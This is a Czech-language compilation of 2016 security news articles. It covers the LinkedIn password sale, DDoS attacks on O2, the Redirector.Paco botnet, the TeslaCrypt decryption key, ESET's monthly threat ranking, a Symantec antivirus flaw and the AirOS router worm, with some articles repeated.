Databáze může představovat pro uživatele potenciální riziko i po změně hesla. Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.

V případě, že lidé používají totožná hesla jako k síti LinkedIn i na jiných webových službách, je vhodné je změnit samozřejmě i tam.


O2 čelí masivním útokům hackerů. Kvůli hokejovému mistrovství

27.7.2016  Počítačový útok
Již několik dní čelí společnost O2 masivním útokům hackerů. Ti se snaží z velkého množství přistupovat na servery O2 a tím je vyřadit z provozu. Právě v souvislosti s DDoS útoky nastal ve čtvrtek výpadek pevného internetu tohoto operátora (vdsl a adsl).
Co je DDoS

Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
„Hackeři zaútočili ve čtvrtek na streamovací servery O2. Jedná se již o několikátý útok od začátku hokejového šampionátu, který zapříčinil technické problémy při online vysílání hokejového zápasu Česka proti USA a několikaminutové problémy s přihlášením k mobilní službě O2 TV,“ uvedla Kateřina Mikšovská z tiskového oddělení O2.

První útoky nastaly už minulý týden. "Přesto jsme byli minulý čtvrtek schopni poskytnout službu 320 tisícům zákazníků a přenést rekordní objem 237 Gbps,“ prohlásil Václav Hanousek, šéf síťového provozu.

Výpadky se prý mohly dotknout také diváků iVysílání. „Intenzita a rozsah útoků vedly k přetížení serverů mobilní televize O2 TV. Krátké výpadky mohli bohužel zaznamenat také diváci, kteří hokejový zápas sledovali prostřednictvím iVysílání. Výpadky se však netýkaly všech uživatelů webu České televize, bez jakýchkoli problémů mohlo zápas sledovat téměř 300 tisíc lidí,“ konstatovala Mikšovská.

Výpadek pevného internetu
Právě kvůli snaze zabránit hackerům v úspěšném útoku bylo v pondělí vyřazeno internetové připojení v Praze a středních Čechách. Výpadek trval více než 1,5 hodiny, jak Novinky.cz informovaly již dříve. 

„Opatření, které jsme na ochranu služby poskytované našim zákazníkům přijali, bohužel vlivem systémové chyby způsobily dnešní výpadek na pevném internetu," konstatoval Hanousek.

Hackerský útok nyní bude řešit policie. „Operátor O2 se již s případem pirátských útoků obrátil na orgány činné v trestním řízení,“ doplnila Mikšovská.


Hacker nabízí k prodeji 167 miliónů hesel ze sítě LinkedIn

27.7.2016 ¨Sociální sítě
Hacker vystupující pod přezdívkou Peace nabízí na černém trhu ke koupi na 167 miliónů přihlašovacích údajů k profesní síti LinkedIn. Požaduje za ně pět bitcoinů, tedy v přepočtu zhruba padesát tisíc korun. Upozornil na to server The Hacker News.
Uživatelská data mají pocházet z útoku, který se stal už v roce 2012. Tehdy o něm informovaly i Novinky.cz. 

Původně se přitom předpokládalo, že ze sítě LinkedIn bylo odcizeno méně než 6,5 miliónu hesel. Jak ale ukazuje nabídka hackera, bylo jich pravděpodobně daleko více.

Hacker postupuje obezřetně
Peace dokonce zveřejnil část databáze, aby případným kupcům ukázal, že nejde o podvrh. To ale samozřejmě nikdo nedokáže dopředu potvrdit, pokud nebude mít k detailní analýze databázi se všemi přihlašovacími údaji.

Jisté je nicméně to, že hacker postupuje velmi obezřetně. Virtuální měnu bitcoin totiž nelze snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.

Zástupci profesní sítě LinkedIn se nechali slyšet, že celý incident již prošetřují. Žádné oficiální vyjádření však zatím nevydali.

Riziko i po letech
Databáze může představovat pro uživatele potenciální riziko i přesto, že útok proběhl před čtyřmi lety. LinkedIn sice v roce 2012 hesla uživatelům resetovala, ale celá řada lidí používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.

Únik dat ze sítě LinkedIn jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla, ale alespoň jednou za pár měsíců je pravidelně měnit.


Hackeři zotročili milión počítačů. Vydělávali tak velké peníze

27.7.2016  Hacking
Skupině zatím neznámých hackerů se podařilo infikovat virem na milión počítačů z různých koutů světa. Přestože jejich majitelé o tom neměli ani tušení, s pomocí jejich PC pak vydělávali velké peníze. Upozornil na to server The Hacker News.
Zotročovat jednotlivé počítače pomáhal kyberzločincům škodlivý kód známý jako Redirector.Paco, který internetem putuje už od roku 2014. Šířil se zpravidla jako příloha nevyžádaného e-mailu nebo odkaz v různých chatech a na sociálních sítích.

Napadené stroje pak útočníci zapojovali do jednoho obrovského botnetu, tedy do sítě zotročených počítačů, které zpravidla slouží k rozesílání spamu nebo útokům typu DDoS. Počítačoví piráti však v tomto případě botnet využívali k něčemu úplně jinému, pomocí něj vydělávali nemalé peníze.

Kontrolovali internetový provoz
Napadené stroje totiž používali k tomu, aby mohli ovládat jejich internetový provoz. Tak byli schopni na pozadí skrytě navštěvovat tisíce různých internetových stránek na každém jednotlivém PC, díky čemuž pak inkasovali peníze za zobrazovanou reklamu.

Bezpečnostní experti antivirové společnosti Bitdefender odhadli, že se jim podobným způsobem podařilo zotročit na milión počítačů. S ohledem na to se tak dá celkem snadno odhadnout, že s pomocí botnetu si vydělali přinejmenším několik jednotek nebo klidně i desítek miliónů dolarů.

Přesnou částku se však bezpečnostním odborníkům, kteří se případem zabývají, nepodařilo zjistit.

Z řádků výše je patrné, že se kyberzločinci snažili pracovat co nejdéle v utajení, aby uživatelé infiltraci škodlivého kódu neodhalili. Přišli by tak o cenný zdroj příjmů.

Virus útočil i v Evropě
Podle Bitdefenderu pocházela většina zotročených počítačů z Indie, Malajsie, Řecka, Spojených států, Itálie, Pákistánu, Brazílie a Alžírska. Není však vyloučeno, že se škodlivým kódem mohly nakazit také stroje tuzemských uživatelů, protože virus se objevil v některých evropských státech.

Bezpečnostní experti připomínají, že hackerům většinou usnadňují práci samotní uživatelé svým chováním. Podceňují totiž základní bezpečnostní pravidla – například klikají na přílohy v nevyžádaných e-mailech, případně neinstalují pravidelně aktualizace jednotlivých programů a operačního sytému.

Z toho všeho jsou pochopitelně kyberzločinci schopni těžit. A vydělávat díky tomu klidně i velké peníze…


Počítačoví piráti se omluvili za šíření vyděračského viru. Data je možné odemknout zadarmo

27.7.2016  Viry
Velmi netradiční zvrat nastal v případě počítačových pirátů, kteří šířili po internetu vyděračské viry. Ti se patrně nemohli už koukat na zkázu, kterou napáchal, a tak se jej rozhodli odstřihnout. Všem uživatelům se navíc omluvili. Upozornil na to server Bleeping Computer.
„Projekt končí, moc se všem omlouváme,“ uvedli neznámí kyberzločinci, kteří šířili po internetu vyděračský virus TeslaCrypt. Aby dokázali, že svou omluvu myslí skutečně vážně, připojili k ní také hlavní dešifrovací klíč. S jeho pomocí je možné zašifrovaná data odemknout i bez placení výkupného.

Sluší se však podotknout, že vyděračských virů existuje přinejmenším několik desítek různých druhů. Univerzální klíč přitom funguje pouze na již zmiňovaný TeslaCrypt.

Kyberzločinci se k nečekanému kroku podle všeho odhodlali díky jednomu bezpečnostnímu výzkumníkovi z antivirové společnosti Eset. Ten je anonymně kontaktoval přes oficiální kanál určený obětem vyděračského viru a požádal o zveřejnění univerzálního dešifrovacího klíče. Sám přitom patrně nečekal, že budou počítačoví piráti tak vstřícní.

Na základě toho vytvořili pracovníci Esetu dešifrovací nástroj, s jehož pomocí je možné uzamčená data na pevném disku snadno odemknout. Stahovat jej je možné zdarma zde.

Nástroj společnosti Eset k dešifrování dat, která byla uzamčena vyděračským virem TeslaCrypt.
Nástroj společnosti Eset k dešifrování dat, která byla uzamčena vyděračským virem TeslaCrypt.
FOTO: archív tvůrců

Jak útočí vyděračské viry
Na napadeném stroji dokážou vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.

Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.

Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě škodlivého kódu TeslaCrypt to však už nyní neplatí.


Na prodej je 117 milionů hesel z LinkedIn, za 2 200 dolarů

20.5.2016
Jako se všemi úniky hesel, musíte být velmi opatrní a velmi zkoumat, jestli to je pravé, vymyšlené, ale třeba i roky staré.
Přihlašovací údaje více než 117 milionů účtů (někde se uvádí i 167 milionů) z LinkedIn jsou nabízeny na prodej za něco přes 2 200 dolarů (respektive 5 BTC). Jde o e-mailové adresy a SHA1 podobu hesel. Skutečnost je ale taková, že nejspíš jde o hesla, která z této služby unikla již v roce 2012.

Podle Then there were 117 million. LinkedIn password breach much bigger than thought i samotné LinkedIn potvrdilo, že jde o uniklá data z roku 2012. Na Lupa.cz se o tomto úniku psalo ve Z LinkedIn.com uniklo 6,5 milionu hesel uživatelů, respektive o jednom z úniků, protože v roce 2012 jich podle všeho bylo několik (nebo jeden větší) a celkový počet tehdy uniklých účtů byl podstatně větší. A to je také důvod, proč je aktuálně řeč o více než 100 milionech účtů.

Na již známém haveibeenpwned.com tehdejší (ani tento nový) únik není zahrnut, ale leakedin.org už také nefunguje. Z tehdejší doby je možné stále najít An Update on LinkedIn Member Passwords Compromised přímo od LinkedIn, pokud vás zajímají roky staré detaily.

Co je podstatné si uvědomit, je, že toto není původní menší únik a že opravdu jde o hesla z roku 2012. Což také může znamenat, že i když váš e-mail a heslo do LinkedIn nebylo v předchozím úniku, může být v tomto novém. Na druhou stranu, jestli jste v roce 2012 používali LinkedIn a nezměnili si heslo, tak je asi něco špatně (změnit jste si ho asi tehdy ale museli, LinkedIn udělalo tehdy reset všech hesel).

Jakkoliv nový únik není na obvyklém testovacím webu, můžete zkusit www.leakedsource.com , kde by už i tato nová data měla být kompletní. S ohledem na to, že jde o více než 100 milionů hesel, tak by mohlo jít o skoro celou tehdejší databázi uživatelů LinkedIn. Dnes má LinkedIn přes 300 milionů účtů, z nichž ale jenom zhruba třetina jsou aktivní uživatelé.

Osobně mohu potvrdit, že na LeakedSource.com je možné v LinkedIn datech najít oba e-mailové účty, které jsem používal v roce 2012 právě na LinkedIn (a na kterých jsem měnil hesla hned poté, co se v roce 2012 zjistilo, že unikla hesla).


Zašifrovaní ransomwarem TeslaCrypt? Eset prý dokáže data zase zpřístupnit

20.5.2016
Nástroj, který dokáže obnovit soubory zašifrované pomocí ransomwaru TeslaCrypt, uveřejnil Eset. Dokáže to ale jen u novějších verzí TeslaCrypt 3 nebo 4. Novinka je ke stažení na webových stránkách dodavatele.

Operátoři ransomwaru TeslaCrypt nedávno ohlásili, že ukončují své škodlivé aktivity. Při této příležitosti jeden z analytiků Esetu anonymně kontaktoval útočníky přes kanál určený obětem TeslaCrypt a požádal jej o univerzální dešifrovací klíč (tzv. master key).

Žádost byla překvapivě kladně vyřízená, což umožnilo Esetu vytvořit řešení pro ty, kteří ztratili přístup ke svým souborům.

TeslaCrypt se poprvé objevil na scéně začátkem roku 2015 a začal se soustředit na obsah spojený s hrami, jako jsou například uložené pozice, uživatelské mapy, ale i na osobní dokumenty a obrázky – celkem šlo o 185 různých koncovek souborů.

Nástroj Esetu dokáže dešifrovat soubory zakódované TeslaCryptem s koncovkou .xxx, .ttt, .micro nebo .mp3, a samozřejmě i ty, jejich koncovka se šifrováním nezměnila.


O2 čelí v souvislosti s MS v hokeji masivním DDoS útokům

19.5.2016 Počítačový útok

Hackeři zaútočili ve čtvrtek 19. května na streamovací servery O2. Jedná se již o několikátý útok od začátku hokejového šampionátu, který zapříčinil technické problémy při online vysílání hokejového zápasu Česka proti USA a několika minutové problémy s přihlášením k mobilní službě O2 TV.

O2 před dnešním zápasem výrazně posílilo své streamovací kapacity a přijalo několik opatření, které pomáhají útoky typu DDoS odrazit.

"První útoky přicházely již minulý týden a o víkendu,"vysvětluje Václav Hanousek, šéf síťového provozu. "Přesto jsme byli minulý čtvrtek schopni poskytnout službu 320 tisicům zákazníků a přenést rekordní objem 237 Gbps. Opatření, které jsme na ochranu služby poskytované našim zákazníkům přijali, bohužel vlivem systémové chyby způsobily dnešní hodinový výpadek na pevném internetu v části Prahy a středních Čech," dodává Hanousek.

Intenzita a rozsah útoků vedly také k přetížení serverů mobilní televize O2 TV. Krátké výpadky mohli bohužel zaznamenat také diváci, kteří hokejový zápas sledovali prostřednictvím iVysílání.


Hackeři zotročili milión počítačů. Vydělávali tak velké peníze

18.5.2016 Hacking
Skupině zatím neznámých hackerů se podařilo infikovat virem na milión počítačů z různých koutů světa. Přestože jejich majitelé o tom neměli ani tušení, s pomocí jejich PC pak vydělávali velké peníze. Upozornil na to server The Hacker News.
Zotročovat jednotlivé počítače pomáhal kyberzločincům škodlivý kód známý jako Redirector.Paco, který internetem putuje už od roku 2014. Šířil se zpravidla jako příloha nevyžádaného e-mailu nebo odkaz v různých chatech a na sociálních sítích.

Napadené stroje pak útočníci zapojovali do jednoho obrovského botnetu, tedy do sítě zotročených počítačů, které zpravidla slouží k rozesílání spamu nebo útokům typu DDoS. Počítačoví piráti však v tomto případě botnet využívali k něčemu úplně jinému, pomocí něj vydělávali nemalé peníze.

Kontrolovali internetový provoz
Napadené stroje totiž používali k tomu, aby mohli ovládat jejich internetový provoz. Tak byli schopni na pozadí skrytě navštěvovat tisíce různých internetových stránek na každém jednotlivém PC, díky čemuž pak inkasovali peníze za zobrazovanou reklamu.

Bezpečnostní experti antivirové společnosti Bitdefender odhadli, že se jim podobným způsobem podařilo zotročit na milión počítačů. S ohledem na to se tak dá celkem snadno odhadnout, že s pomocí botnetu si vydělali přinejmenším několik jednotek nebo klidně i desítek miliónů dolarů.

Přesnou částku se však bezpečnostním odborníkům, kteří se případem zabývají, nepodařilo zjistit.

Z řádků výše je patrné, že se kyberzločinci snažili pracovat co nejdéle v utajení, aby uživatelé infiltraci škodlivého kódu neodhalili. Přišli by tak o cenný zdroj příjmů.

Virus útočil i v Evropěy

Podle Bitdefenderu pocházela většina zotročených počítačů z Indie, Malajsie, Řecka, Spojených států, Itálie, Pákistánu, Brazílie a Alžírska. Není však vyloučeno, že se škodlivým kódem mohly nakazit také stroje tuzemských uživatelů, protože virus se objevil v některých evropských státech.

Bezpečnostní experti připomínají, že hackerům většinou usnadňují práci samotní uživatelé svým chováním. Podceňují totiž základní bezpečnostní pravidla – například klikají na přílohy v nevyžádaných e-mailech, případně neinstalují pravidelně aktualizace jednotlivých programů a operačního sytému.

Z toho všeho jsou pochopitelně kyberzločinci schopni těžit. A vydělávat díky tomu klidně i velké peníze…y


Jaké jsou aktuálně nejčastější hrozby v Česku?

18.5.2016 Viry
Globálně nejvíce zlobí červ Bundpil, v Česku se ale momentálně nejčastěji šíří infikované přílohy e-mailu.

Žebříček deseti největších bezpečnostních hrozeb v IT za měsíc duben zveřejnil Eset. Podle něj oproti březnu výrazně stouplo rozšíření škodlivého červa Bundpil, který se šíří prostřednictvím vyměnitelných médií. Druhou nejčastější hrozbu představuje trojan Nemucod, třetí je potom Javascript Danger.ScriptAttachment. Ten je ve světovém měřítku třetí, v České republice se jedná o hrozbu nejčastější.

„Červ Bundpil obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ popisuje Petr Šnajdr, expert Esetu.

Bundpil předstihl trojského koně Nemucod. I ten však nadále zaznamenával zvýšený výskyt a v žebříčku deseti největších kybernetických hrozeb za měsíc duben se posunul na druhé místo.

Nemucod používají hackeři jako prostředek pro instalaci dalších škodlivých kódů a ovládnutí infikovaného zařízení. „Jde o klasický downloader, který se šíří jako příloha e-mailových zpráv. Nejčastěji se maskuje jako faktura nebo pozvánka k soudu,“ konstatuje Šnajdr.

Nově se v desítce nejaktivnějších škodlivých kódů objevuje na třetí pozici JS/Danger.ScriptAttachment, což je škodlivý soubor, který se šíří jako příloha e-mailu a může způsobit stažení malware. „Jde o detekci, která podle obecnějších kritérií posuzuje škodlivost zprávy. Detekce JS/Danger pokrývá jiným algoritmem varianty škodlivého kódu Nemucod, a proto je část Nemucodu detekována jako JS/Danger. V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětluje Šnajdr.

Aktuálně se v přehledu nejčastějších kybernetických hrozeb objevuje i vir Agent.XWT, který otevírá vrátka dalším infiltracím. Nejrozšířenější hrozby v první pětici uzavírá kód ScrInject, který otevírá webové HTML stránky se škodlivými skripty nebo vloženými iframe objekty, které automaticky přesměrovávají zařízení ke stažení malware.

Druhá polovina žebříčku nejaktivnějších virů už neobsahuje tak rozšířené škodlivé kódy. Na šestou pozici se v dubnu posunul trojan HTML/Refresh, který přesměrovává internetový prohlížeč na nepříliš důvěryhodná URL. Sedmou pozici si stejně jako v březnu udržel virus Rammit, který se aktivuje při každém spuštění systému a jeho pomocí může útočník na dálku vypnout nebo restartovat napadený počítač.

Na osmou pozici z březnové třetí příčky v dubnu klesl malware Agent.CR, který ke svému maskování používá soubor typu LNK a v rámci něho zneužívá ke svým aktivitám systémový program rundll32.exe.

Devátou příčku pak obsadil polymorfní virus Sality, který při každém restartu operačního systému narušuje nebo odstraňuje bezpečnostní aplikace.

Dubnový žebříček nejrozšířenějších kybernetických hrozeb uzavírá malware Agent.BZ, který podobně jako Agent.CR využívá volání škodlivé funkce ze své DLL knihovny pomocí runddl32.exe.

Top 10 hrozeb - globální přehled

Win32/Bundpil
JS/TrojanDownloader.Nemucod
JS/Danger.ScriptAttachment
Win32/Agent.XWT
HTML/ScrInject
HTML/Refresh
Win32/Ramnit
LNK/Agent.CR
Win32/Sality
LNK/Agent.BZ


Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů

18.5.2016 Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.

Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.

Samotné spuštění souboru již není třeba: Jádro antiviru používá ovladač k zachycení všech systémových operací a automaticky soubor „projede“ ve chvíli, kdy jakkoli pronikne do systému.

Již v pondělí firma chybu opravila v Anti-Virus Engine (AVE) aktualizaci verze 20151.1.1.4 skrze službu LiveUpdate. Bezpečnostní vadou je přetečení bufferu, které mohlo nastat během parsování spustitelných souborů s vadným záhlavím.

Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.

Zdaleka nejhorší zprávou však je, že Symantec AVE takové soubory rozbaluje uvnitř kernelu, tedy přímo v jádru operačního systému, oblasti s nejvyššími pravomocemi. To znamená, že úspěšné nakažení systému může vést ke kompletní ztrátě moci nad celým systémem.

„Na Linuxu, Macu a dalších unixových platformách může tento proces způsobit vzdálené přetečení heapu (haldy) v procesech Symantecu nebo Nortonu,“ vysvětluje Ormandy v článku k tématu. „Ve Windows tento proces vede k přetečení paměti přidělené kernelu, jak je sken jádra v kernelu postupně načítán, což z toho činí vzdálenou zranitelnost ring0 memory corruption – o moc horší už to být nemůže.“

Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.

„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.

Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.

Jde o nejnovější z dlouhé řady kritických chyb nalezených Ormandym a jinými bezpečnostními analytiky v antivirových produktech z posledních let. Většina z nich nepřestává výrobce antivirů kritizovat za jejich tendenci pokračovat s nebezpečnými skeny souborů, které v minulosti vedly ke zneužití chyb pomocí získaných pravomocí kernelu.


CSIRT varuje před útoky na Ubiquity jednotky. Virus kosí Wi-Fi sítě v Česku

17.5.2016 Zdroj: Lupa.cz Viry
V poslední době obdrželo Ubiquiti několik zpráv o napadení systému airOS na neaktualizovaných zařízeních. Odhaduje se, že by bez internetu mohly být řádově tisíce uživatelů.
Tak se nám zase viry dostaly do republiky. „Jedná se o HTTP/HTTPS malware, který útočí převážně na starší zařízení bez aktuálního firmwaru. Vir nevyžaduje ověření, infikuje i zaheslovaná zařízení. První napadá jednotky s veřejnou IP adresou a pak se šíří dál do sítě. Podle aktuálních informací postihl tento virus také klienty několika poskytovatelů internetového připojení v ČR,“ tvrdí varování na stránkách CSIRTu.

Ubiquity je značka síťového hardware, která je v tuzemsku populární především mezi lokálními providery. Už včera varoval i prodejce síťových prvků i4wifi, který popisuje i příznaky útoku a možné řešení situace s tím, že v některých případech je možné vyřešit problém na dálku.

Analytik Pavel Bašta bezpečnostního týmu popsal pro ČTK princip viru tak, že dotčená zařízení nastaví do tzv. výchozího stavu. Využívá přitom chybu ve webových službách, která má za následek úplnou kontrolu nad zařízením. Tato zranitelnost by měla být opravena ve firmware verze 5.6.5.


Problém se může týkat podle odhadů řádově tisíců uživatelů. Česko je totiž v Evropě bezdrátovou velmocí. A to především kvůli liknavému přístupu tehdejšího Českého Telecomu k rozšiřování ADSL. Na přelomu tisíciletí tak vzali lidé na připojení k rychlému internetu do svých rukou a po celé republice vznikala malá sdružení, která se postupně proměňovala v providery.

Do pátrání po škodách se zapojilo i další veřejnoprávní médium. Podle Radiožurnálu s infekcí bojuje například jihlavská firma M-Soft, kde technici musí osobně navštívit 1500 domácností. Další napadené antény opravují na dálku. Podle informací firmy jsou stejné problémy i na Děčínsku a Náchodsku.

Problémy v minulých dnech však hlásili i poskytovatelé v Havlíčkově Brodě, Mnichově Hradišti nebo v Příbrami. Starší zařízení po napadení přestala fungovat. Problémy začaly v sobotu a pracovníci havlíčkobrodského providera museli dojet k desítkám zákazníků a zařízení znovu nastavit.


Virus napadl tisíce routerů v Česku, varoval Národní bezpečnostní tým

17.5.2016 Viry
Národní bezpečnostní tým CSIRT.CZ v úterý varoval před novým počítačovým virem, který se šíří Českem jako lavina. Zaměřuje se výhradně na routery – brány do světa internetu, prostřednictvím kterých se pak počítačoví piráti dostanou do celé počítačové sítě. Infikovaných strojů mají být v tuzemsku tisíce.
Virus útočí nejčastěji na neaktualizovaná zařízení. „Jedná se o HTTP/HTTPS malware, který útočí převážně na starší zařízení bez aktuálního firmwaru. Vir nevyžaduje ověření, infikuje i zaheslovaná zařízení,“ varoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

„Podle aktuálních informací postihl tento virus také klienty několika poskytovatelů internetového připojení v ČR,“ doplnil Bašta.

Česká tisková kancelář upřesnila, že napadené přístroje jsou hlášeny například na Děčínsku či Náchodsku, ale také v Havlíčkově Brodě, Mnichově Hradišti nebo Příbrami. Největší problémy ale podle Radiožurnálu má firma M-Soft z Jihlavy, kde technici musejí osobně navštívit 1500 domácností. Po celé republice jsou tak tisíce infikovaných routerů.

Jak poznat, že je router zavirovaný?
Problémy se podle všeho týkají pouze uživatelů, kteří přijímají internet prostřednictvím wi-fi a mají router se systémem airOS. Lidé používající například kabelové rozvody či služby mobilních operátorů (modemy se SIM kartami) by v ohrožení být neměli.

Že je router zavirovaný, mohou uživatelé poznat například podle toho, že jim přestane z připojených počítačů zcela fungovat internetové připojení, případně se při snaze o připojení na nějakou webovou stránku zobrazí úplně jiný web.

Přesně to se stalo už v minulosti kvůli zranitelnosti známé jako „rom-0“. Místo serverů, jako jsou například Seznam.cz nebo Google.com, se poškozeným zobrazila hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhnul další virus. Útočníci tak rázem měli přístup nejen k routeru, ale i k připojenému počítači.

Útoky jsou stále častější
Na brány do světa internetu se zaměřují kyberzločinci stále častěji. Využívají toho, že zabezpečení těchto internetových zařízení uživatelé především v domácnostech velmi podceňují, někdy to ale platí i o firmách. Březnová studie Cisco Annual Security Report totiž ukázala, že devět z deseti internetových zařízení má slabá místa.

Hlavní problém je podle bezpečnostních expertů v tom, že routery není možné chránit antivirovými programy, jako je tomu u počítačů. I tak ale nejsou uživatelé úplně bezbranní. „Hlavní způsob, jak této hrozbě předejít, představuje upgrade firmwaru routeru na aktuální verzi a nepoužívat mnohdy triviální přednastavené přihlašovací jméno a heslo. Rovněž je vhodné zvážit přihlašování k routeru pouze z vnitřní sítě, a nikoliv z internetu,“ uvedl již dříve Pavel Matějíček, manažer technické podpory společnosti Eset.

Do konfigurace routerů by se nicméně neměli pouštět méně zkušení uživatelé. Mohou totiž nevhodným nastavením způsobit více škody než užitku. Paradoxně tak mohou klidně otevřít zadní vrátka pro útočníky.


Červ Bundpil otevírá zadní vrátka do systému. Přes ně pak proudí další viry

17.5.2016 Viry
Především přes vyměnitelná média se šíří nebezpečný červ, kterého bezpečnostní experti nazývají Bundpil. Ten je aktuálně světově nejrozšířenější hrozbou a v počítači dokáže vytvořit zadní vrátka pro další škodlivý software, varovala antivirová společnost ESET.
Bundpil se nejčastěji šíří prostřednictvím nejrůznějších USB flashek a externích disků. „Červ obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ uvedl Petr Šnajdr, bezpečnostní expert společnosti ESET.

To jinými slovy znamená, že díky Bundpilu mohou počítačoví piráti propašovat do cizího počítače prakticky jakýkoliv jiný virus. Teoreticky se s využitím těchto nezvaných návštěvníků mohou dostat k cizím uživatelským datům nebo například odposlouchávat probíhající komunikaci, a tedy i snadno odchytávat přihlašovací údaje k různým službám.

Šíří vyděračské viry
Zákeřný červ dělá bezpečnostním expertům dokonce větší vrásky na čele než škodlivý kód Nemucod, který ještě před pár týdny žebříčku nejrozšířenějších hrozeb kraloval. Ten přitom dokáže prakticky to samé jako Bundpil – uhnízdí se v počítači a může potom stahovat další nezvané návštěvníky.

Nejčastěji stahuje vyděračské viry. „Aktuálně stahuje především různé typy ransomwaru, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ varoval již dříve Šnajdr.

Nemucod je stále druhým nejrozšířenějším virem na světě, ale v dubnu se nešířil tak agresivně jako absolutní král žebříčku, červ Bundpil.

Útočí i v Česku
Na pozoru by se uživatelé měli mít také před hrozbou s krkolomným názvem JS/Danger.ScriptAttachment. Ta se do desítky nejrozšířenějších virů v globálním měřítku dostala vůbec poprvé, přesto vyskočila rovnou na třetí příčku.

Je tedy zřejmé, že se tato hrozba šíří až nečekaně rychle.

Jde o škodlivý soubor, který se šíří jako příloha e-mailu a také otevírá zadní vrátka do operačního systému. „V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětlil Šnajdr.

Deset nejrozšířenějších virových hrozeb za měsíc duben
1. Win32/Bundpil
2. JS/TrojanDownloader.Nemucod
3. JS/Danger.ScriptAttachment
4. Win32/Agent.XWT
5. HTML/ScrInject
6. HTML/Refresh
7. Win32/Ramnit
8. LNK/Agent.CR
9. Win32/Sality
10. LNK/Agent.BZ


Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)
17.5.2016 Zdroj: root.cz
Viry

Zařízení s operačním systémem AirOS jsou ohrožena kvůli vážné bezepčnostní mezeře, která dovoluje modifikovat souborový systém bez znalosti přihlašovacích údajů. Jak se bránit?
Před pěti lety se kvůli bezpečnostní díře začal šířit virus Skynet. Možná si pamatujete na nahodilé restartovaní zařízení. Před měsícem byla popsána nová bezpečností díra ve všech typech zařízení AirOS. Ta umožňuje útočníkovi nahrát jakýkoliv soubor kamkoliv do souborového systému Wi-Fi zařízení bez znalosti přihlašovacích údajů.

V pondělí 16. května byl konečně vydán opravný firmware verze 5.6.5, který tuto chybu řeší. Jak se vlastně dostane do nezabezpečeného zařízení?

Infekce zařízení
Jelikož exploit umožňuje nahrání souboru kamkoliv do souborového systému, virus si nahraje veřejný klič SSH do routeru (bez nutnosti autentizace). Také zkopíruje sám sebe do zařízení. Přihlásí se pomocí SSH a nainstaluje se. Tedy rozbalí si tar, zapíše se do souboru rc.poststart a zapíše se do perzistentní paměti. Pak se restartuje.

Po restartu
Znovu se rozbalí z taru, a spustí soubor mother. Tato matka si nastaví firewall na HTTP/HTTPS – tím můžete poznat infikované zařízení. Dále inicializuje stažení příkazu curl a několika knihoven pomocí wget. Příkaz curl potřebuje pro své šíření a nevejde se do perzistentní paměti.

Následně spustí search a začne skenovat adresní prostor. Pokud najde zařízení které by mohlo být „airos“, zkusí na něj nahrát pomocí HTTP (HTTPS) opět svůj veřejný klíč a následně se zkusí pomocí SSH přihlásit do zařízení a nainstalovat se.

To však není vše. Skript si ukládá IP adresu pravděpodobně infikovaných zařízení a zkusí je všechny přibližně jednou za 66 666 sekund (18,5 hodiny) resetovat pomocí webového přístupu do továrního nastavení – skript fucker. Reset se podaří jen na zařízení, které se nepodařilo správně infikovat a samozřejmě mají zranitelný firmware.

Dále na hostitelském zařízení pustí odpočet na 666 666 sekund (7,5 dne) a po uplynutí přenastaví ESSID na „motherfucker“ a následně zařízení vypne. Detaily naleznete na fóru ubnt.

Jak se bránit?
